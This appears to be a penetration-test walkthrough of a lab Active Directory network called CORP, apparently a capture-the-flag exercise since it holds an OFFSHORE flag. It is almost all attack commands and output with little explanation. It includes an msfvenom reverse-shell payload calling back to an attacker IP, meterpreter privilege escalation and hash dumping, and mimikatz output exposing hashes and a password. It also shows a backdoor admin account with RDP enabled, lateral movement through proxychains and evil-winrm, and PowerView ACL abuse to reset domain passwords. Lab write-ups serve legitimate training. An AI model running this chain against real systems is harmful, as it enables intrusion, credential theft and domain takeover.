Initial exploitation
Got the meterpreter shell
meterpreter > getsystem
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
Getting new meterpreter shell without sqlmap
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.108 LPORT=4447 -f exe > prompt.exe
meterpreter > upload prompt.exe
.\prompt.exe
exit
On new meterpreter shell
Got Access to the SQL01
getsystem
migrate
hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
justalocaladmin:1002:aad3b435b51404eeaad3b435b51404ee:52cf26fe133b543d3dc733d37ef1024b:::
Uploading Mimikatz and dumping the logon passwords
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 110389 (00000000:0001af35)
Session : Service from 0
User Name : MSSQL$SQLEXPRESS
Domain : NT Service
Logon Server : (null)
Logon Time : 4/26/2023 10:30:09 PM
SID : S-1-5-80-3880006512-4290199581-1648723128-3569869737-3631323133
msv :
[00000003] Primary
* Username : SQL01$
* Domain : CORP
* NTLM : b40dae2bd88b86bf78ea95ba80f95f33
* SHA1 : b3251c1ffe7ed34407c29fc38ee1c91eba155694
tspkg :
wdigest :
* Username : SQL01$
* Domain : CORP
* Password : (null)
kerberos :
* Username : SQL01$
* Domain : CORP.LOCAL
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 66693 (00000000:00010485)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 4/26/2023 10:30:06 PM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : SQL01$
* Domain : CORP
* NTLM : b40dae2bd88b86bf78ea95ba80f95f33
* SHA1 : b3251c1ffe7ed34407c29fc38ee1c91eba155694
tspkg :
wdigest :
* Username : SQL01$
* Domain : CORP
* Password : (null)
kerberos :
* Username : SQL01$
* Domain : corp.local
* Password : `\Zqw(<K!xPD'EYp7pU:7%o/jsklO1v*<u,a+b)\kyh?2Vs(5XV/eu\Km;5MNxUw!k@I-mQa$.Q.o<80XA4N7#rX4+Tj\v-MhKM453zBa$G0*oq-W8yD=Pna
ssp :
credman :
Authentication Id : 0 ; 66470 (00000000:000103a6)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 4/26/2023 10:30:06 PM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : SQL01$
* Domain : CORP
* NTLM : b40dae2bd88b86bf78ea95ba80f95f33
* SHA1 : b3251c1ffe7ed34407c29fc38ee1c91eba155694
tspkg :
wdigest :
* Username : SQL01$
* Domain : CORP
* Password : (null)
kerberos :
* Username : SQL01$
* Domain : corp.local
* Password : `\Zqw(<K!xPD'EYp7pU:7%o/jsklO1v*<u,a+b)\kyh?2Vs(5XV/eu\Km;5MNxUw!k@I-mQa$.Q.o<80XA4N7#rX4+Tj\v-MhKM453zBa$G0*oq-W8yD=Pna
ssp :
credman :
Authentication Id : 0 ; 35946 (00000000:00008c6a)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 4/26/2023 10:30:05 PM
SID :
msv :
[00000003] Primary
* Username : SQL01$
* Domain : CORP
* NTLM : b40dae2bd88b86bf78ea95ba80f95f33
* SHA1 : b3251c1ffe7ed34407c29fc38ee1c91eba155694
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : SQL01$
Domain : CORP
Logon Server : (null)
Logon Time : 4/26/2023 10:30:05 PM
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : SQL01$
* Domain : CORP
* Password : (null)
kerberos :
* Username : sql01$
* Domain : CORP.LOCAL
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : SQL01$
Domain : CORP
Logon Server : (null)
Logon Time : 4/26/2023 10:30:06 PM
SID : S-1-5-20
msv :
[00000003] Primary
* Username : SQL01$
* Domain : CORP
* NTLM : b40dae2bd88b86bf78ea95ba80f95f33
* SHA1 : b3251c1ffe7ed34407c29fc38ee1c91eba155694
tspkg :
wdigest :
* Username : SQL01$
* Domain : CORP
* Password : (null)
kerberos :
* Username : sql01$
* Domain : CORP.LOCAL
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 4/26/2023 10:30:06 PM
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
Found a share.bat file which gave me access to Z: on FS01 after executing
OFFSHORE{sl0ppy_scr1pting_hurt$}
User love to take shortcuts
Backup.ps1
PS Z:\> type backup.ps1
type backup.ps1
#set server location,credentials
$Server = "\\172.16.4.100"
$FullPath = "$Server\q1\backups"
$username = "pgibbons"
$password = "I l0ve going Fishing!"
0694311c666b622f590f1c1837422c5f
net use $Server $password /USER:$username
try
{
#copy the backup
Copy-Item $zipFileName $FullPath
#remove all zips older than 1 month from the unc path
Get-ChildItem "$uncFullPath\*.zip" |? {$_.lastwritetime -le (Get-Date).AddMonths(-1)} |% {Remove-Item $_ -force }
}
catch [System.Exception] {
WriteToLog -msg "could not copy backup to remote server... $_.Exception.Message" -type Error
}
finally {
#cleanup
net use $Server /delete
}
Adding a new user
Add local user and put them local Administrators group
net user ipsec TryHarder.1234 /ADD
net localgroup Administrators ipsec /ADD
Add user to interesting groups:
net localgroup "Remote Desktop Users" ipsec /add
Adding access for Remote Desktop Connection
PS C:\> Set-itemproperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\' -Name "fDenyTSConnections" -value 0
PS C:\> Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\' -Name "UserAuthentication" -value 1
PS C:\> Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
RDP Connection
xfreerdp
proxychains xfreerdp /u:ipsec /v:172.16.1.15 /p:TryHarder.1234
Running Powershell as pgibbons
Import-Module .\powerview.ps1
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity salvador -AccountPassword $UserPassword
Set-DomainUserPassword -Identity blake -AccountPassword $UserPassword -Verbose
Running Powershell as salvador
Import-Module .\powerview.ps1
net group "Security Engineers" salvador /add /domain
## restart the shell
Add-DomainObjectAcl -TargetIdentity cyber_adm -PrincipalIdentity salvador -Rights All
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
> Set-DomainUserPassword -Identity cyber_adm -AccountPassword $UserPassword
getting the Shell on WEB-WIN01
Post Exploitation
Alternate Method
proxychains evil-winrm -i 172.16.1.101 -u svc_iis -p Vintage!
$SecPassword = ConvertTo-SecureString 'I l0ve going Fishing!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('CORP\pgibbons', $SecPassword)
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity salvador -AccountPassword $UserPassword -Credential $Cred
$SecPasswords = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Creds = New-Object System.Management.Automation.PSCredential('CORP\salvador', $SecPasswords)
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Add-DomainGroupMember -Identity 'Security Engineers' -Members 'salvador' -Credential $Creds -Verbose
Add-DomainObjectAcl -Credential $Creds -TargetIdentity cyber_adm -PrincipalIdentity salvador -Rights All
Set-DomainUserPassword -Identity cyber_adm -AccountPassword $UserPassword -Credential $Creds